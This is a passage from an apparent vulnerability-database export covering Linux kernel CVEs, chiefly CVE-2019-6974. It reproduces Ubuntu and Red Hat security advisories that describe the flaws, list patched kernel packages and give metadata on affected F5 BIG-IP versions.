        "id": "CVE-2021-3490"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3490"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-25T00:00:00",
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "date": "2021-07-23T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "date": "2022-08-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "date": "2021-05-12T13:52:34",
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "date": "2021-05-12T13:52:40",
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "date": "2021-05-12T13:52:46",
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "date": "2021-06-04T02:15:07.150000",
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "date": "2021-04-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "date": "2021-05-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-25T00:00:00",
        "db": "ZDI",
        "id": "ZDI-21-606"
      },
      {
        "date": "2021-07-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-54395"
      },
      {
        "date": "2022-08-30T01:52:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      },
      {
        "date": "2021-09-14T14:31:03.317000",
        "db": "NVD",
        "id": "CVE-2021-3490"
      },
      {
        "date": "2021-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "date": "2021-11-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "162550"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-723"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Out-of-bounds read vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012328"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ],
    "trust": 0.6
  }
}

var-201902-0242
Vulnerability from variot

In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free. Linux kernel Contains a race condition vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux kernel is prone to a security bypass vulnerability. Attackers can exploit this issue to bypass security restrictions to perform unauthorized actions; this may aid in launching further attacks. Versions prior to Linux kernel 4.20.8 are vulnerable. ========================================================================== Ubuntu Security Notice USN-3930-2 April 02, 2019

linux-hwe, linux-azure vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.

Mathias Payer and Hui Peng discovered a use-after-free vulnerability in the Advanced Linux Sound Architecture (ALSA) subsystem. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2018-19824)

Shlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information leak in the Bluetooth implementation of the Linux kernel. An attacker within Bluetooth range could use this to expose sensitive information (kernel memory). An attacker in a guest VM with access to /dev/kvm could use this to cause a denial of service (guest VM crash). (CVE-2019-6974)

Jim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in the KVM subsystem of the Linux kernel, when using nested virtual machines. A local attacker in a guest VM could use this to cause a denial of service (system crash) or possibly execute arbitrary code in the host system. (CVE-2019-7221)

Felix Wilhelm discovered that an information leak vulnerability existed in the KVM subsystem of the Linux kernel, when nested virtualization is used. A local attacker could use this to expose sensitive information (host system memory to a guest VM). (CVE-2019-7222)

Jann Horn discovered that the eBPF implementation in the Linux kernel was insufficiently hardened against Spectre V1 attacks. A local attacker could use this to expose sensitive information. (CVE-2019-7308)

It was discovered that a use-after-free vulnerability existed in the user- space API for crypto (af_alg) implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-8956)

It was discovered that the Linux kernel did not properly deallocate memory when handling certain errors while reading files. A local attacker could use this to cause a denial of service (excessive memory consumption). A local attacker with access to the IPMI character device files could use this to cause a denial of service (system crash). (CVE-2019-9003)

Jann Horn discovered that the SNMP NAT implementation in the Linux kernel performed insufficient ASN.1 length checks. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-9162)

Jann Horn discovered that the mmap implementation in the Linux kernel did not properly check for the mmap minimum address in some situations. A local attacker could use this to assist exploiting a kernel NULL pointer dereference vulnerability. (CVE-2019-9213)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 18.04 LTS: linux-image-4.18.0-1014-azure 4.18.0-1014.14~18.04.1 linux-image-4.18.0-17-generic 4.18.0-17.18~18.04.1 linux-image-4.18.0-17-generic-lpae 4.18.0-17.18~18.04.1 linux-image-4.18.0-17-lowlatency 4.18.0-17.18~18.04.1 linux-image-4.18.0-17-snapdragon 4.18.0-17.18~18.04.1 linux-image-azure 4.18.0.1014.13 linux-image-generic-hwe-18.04 4.18.0.17.67 linux-image-generic-lpae-hwe-18.04 4.18.0.17.67 linux-image-lowlatency-hwe-18.04 4.18.0.17.67 linux-image-snapdragon-hwe-18.04 4.18.0.17.67 linux-image-virtual-hwe-18.04 4.18.0.17.67

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2019:0818-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:0818 Issue date: 2019-04-23 CVE Names: CVE-2019-6974 CVE-2019-7221 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Security Fix(es):

  • Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() (CVE-2019-6974)

  • Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer (CVE-2019-7221)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • rbd: avoid corruption on partially completed bios [rhel-7.6.z] (BZ#1672514)

  • xfs_vm_writepages deadly embrace between kworker and user task. [rhel-7.6.z] (BZ#1673281)

  • Offload Connections always get vlan priority 0 [rhel-7.6.z] (BZ#1673821)

  • [NOKIA] RHEL sends flood of Neighbour Solicitations under specific conditions [rhel-7.6.z] (BZ#1677179)

  • RHEL 7.6 - Host crash occurred on NVMe/IB system while running controller reset [rhel-7.6.z] (BZ#1678214)

  • [rhel7] raid0 md workqueue deadlock with stacked md devices [rhel-7.6.z] (BZ#1678215)

  • [PureStorage7.6]nvme disconnect following an unsuccessful Admin queue creation causes kernel panic [rhel-7.6.z] (BZ#1678216)

  • RFC: Regression with -fstack-check in 'backport upstream large stack guard patch to RHEL6' patch [rhel-7.6.z] (BZ#1678221)

  • [Hyper-V] [RHEL 7.6]hv_netvsc: Fix a network regression after ifdown/ifup [rhel-7.6.z] (BZ#1679997)

  • rtc_cmos: probe of 00:01 failed with error -16 [rhel-7.6.z] (BZ#1683078)

  • ACPI WDAT watchdog update [rhel-7.6.z] (BZ#1683079)

  • high ovs-vswitchd CPU usage when VRRP over VXLAN tunnel causing qrouter fail-over [rhel-7.6.z] (BZ#1683093)

  • Openshift node drops outgoing POD traffic due to NAT hashtable race in __ip_conntrack_confirm() [rhel-7.6.z] (BZ#1686766)

  • [Backport] [v3,2/2] net: igmp: Allow user-space configuration of igmp unsolicited report interval [rhel-7.6.z] (BZ#1686771)

  • [RHEL7.6]: Intermittently seen FIFO parity error on T6225-SO adapter [rhel-7.6.z] (BZ#1687487)

  • The number of unsolict report about IGMP is incorrect [rhel-7.6.z] (BZ#1688225)

  • RDT driver causing failure to boot on AMD Rome system with more than 255 CPUs [rhel-7.6.z] (BZ#1689120)

  • mpt3sas_cm0: fault_state(0x2100)! [rhel-7.6.z] (BZ#1689379)

  • rwsem in inconsistent state leading system to hung [rhel-7.6.z] (BZ#1690323)

Users of kernel are advised to upgrade to these updated packages, which fix these bugs.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1671904 - CVE-2019-7221 Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer 1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-957.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm kernel-doc-3.10.0-957.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.12.1.el7.x86_64.rpm kernel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm perf-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-957.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm kernel-doc-3.10.0-957.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.12.1.el7.x86_64.rpm kernel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm perf-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-957.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm kernel-doc-3.10.0-957.12.1.el7.noarch.rpm

ppc64: kernel-3.10.0-957.12.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-957.12.1.el7.ppc64.rpm kernel-debug-3.10.0-957.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-957.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-957.12.1.el7.ppc64.rpm kernel-devel-3.10.0-957.12.1.el7.ppc64.rpm kernel-headers-3.10.0-957.12.1.el7.ppc64.rpm kernel-tools-3.10.0-957.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-957.12.1.el7.ppc64.rpm perf-3.10.0-957.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm python-perf-3.10.0-957.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm

ppc64le: kernel-3.10.0-957.12.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debug-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.12.1.el7.ppc64le.rpm kernel-devel-3.10.0-957.12.1.el7.ppc64le.rpm kernel-headers-3.10.0-957.12.1.el7.ppc64le.rpm kernel-tools-3.10.0-957.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-957.12.1.el7.ppc64le.rpm perf-3.10.0-957.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm python-perf-3.10.0-957.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm

s390x: kernel-3.10.0-957.12.1.el7.s390x.rpm kernel-debug-3.10.0-957.12.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.s390x.rpm kernel-debug-devel-3.10.0-957.12.1.el7.s390x.rpm kernel-debuginfo-3.10.0-957.12.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-957.12.1.el7.s390x.rpm kernel-devel-3.10.0-957.12.1.el7.s390x.rpm kernel-headers-3.10.0-957.12.1.el7.s390x.rpm kernel-kdump-3.10.0-957.12.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-957.12.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-957.12.1.el7.s390x.rpm perf-3.10.0-957.12.1.el7.s390x.rpm perf-debuginfo-3.10.0-957.12.1.el7.s390x.rpm python-perf-3.10.0-957.12.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.s390x.rpm

x86_64: bpftool-3.10.0-957.12.1.el7.x86_64.rpm kernel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm perf-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-957.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-957.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-957.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-957.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.12.1.el7.noarch.rpm kernel-doc-3.10.0-957.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.12.1.el7.x86_64.rpm kernel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-devel-3.10.0-957.12.1.el7.x86_64.rpm kernel-headers-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.12.1.el7.x86_64.rpm perf-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.12.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-6974 https://access.redhat.com/security/cve/CVE-2019-7221 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXL8hr9zjgjWX9erEAQhpRA//SO28D0BzCiZeNMWg7p//rAc9DGgsNxnq CMBTE2lJGOOt0DXTAw9Y3h/p46aA1UUbGmjUtL/Vvu0RUpuuPTOa3hzviavXVGBu PLh+QHRw9E9NBi90T24R2M0CeuUCVDn2UUqIWia7d5bb3VuS6zCjP8cq9bBa7kBN /bpYXeCv38pLGDU2H8P8N7EY4pFJBXp7CpiuLvsMgxNfUlxEZh913BfStDHWJAg2 yi9NdCNtG+3hFB3LhLEedYTGxfZmuNBp8K9D6en1RryideGeyyjGiKKShRGclD+o KOnuXrPuHdS5fO1ci8FzymQapQSzUWjuwYXmqFAaPLLOGesGgb1wiCKgqLN3+3Oy jjlDtD8lkiZDNwDRs27WOkQMzsV/+J0cUAQOoP0KbetSQSJuRLXD0Kkss0c8kpO6 W7YVpwVnMioe0jFtpNu8OtjIgsTRycZ+Z01Mr7U/gH9J7i5Dysvtil+2i2xBPnM5 +vLPIDzreB+pbG5BPrIUgM/CkYh5Yltq4nbiifhWXdSxR/t0a06in60SbDezB6Lt SnQavsmJSZBQ5iEhQABcMNChZPeZj1N5haC4ZFP8XD9gJLZyrNqL1tBLzVr4xhzx +4Trsi6td3ZuQe0wdX2rS07oIk6Tjc2yxNaiGMvM4NPYt4ZOswZvyQYk4QPJ2VRN zd1Qi+4M27U=IoLu -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 7.4) - noarch, x86_64

Bug Fix(es):

  • guest softlockup in mem_cgroup_reparent_charges with 800GB guests (BZ#1770111)

  • [RHEL7.7] Refined TSC clocksource calibration occasionally fails on some SkyLake-X servers (BZ#1775682)

M. 7) - aarch64, noarch, ppc64le

Bug Fix(es):

  • [kernel-alt]: BUG: unable to handle kernel NULL pointer IP: crypto_remove_spawns+0x118/0x2e0 (BZ#1536967)

  • [HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages (BZ#1610534)

  • RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration / powerpc/pseries/mobility: Extend start/stop topology update scope (LPM) (BZ#1673613)

  • RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in FIPS mode (BZ#1673979)

  • RHEL-Alt-7.6 - System crashed after oom - During ICP deployment (BZ#1710304)

  • kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)

  • RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3 cores in quad and misses last core. (CORAL) (BZ#1717836)

  • RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN (BZ#1717906)

  • fragmented packets timing out (BZ#1729066)

  • Backport TCP follow-up for small buffers (BZ#1733617)

Enhancement(s):

  • RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading nest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201902-0242",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "4.20.8"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
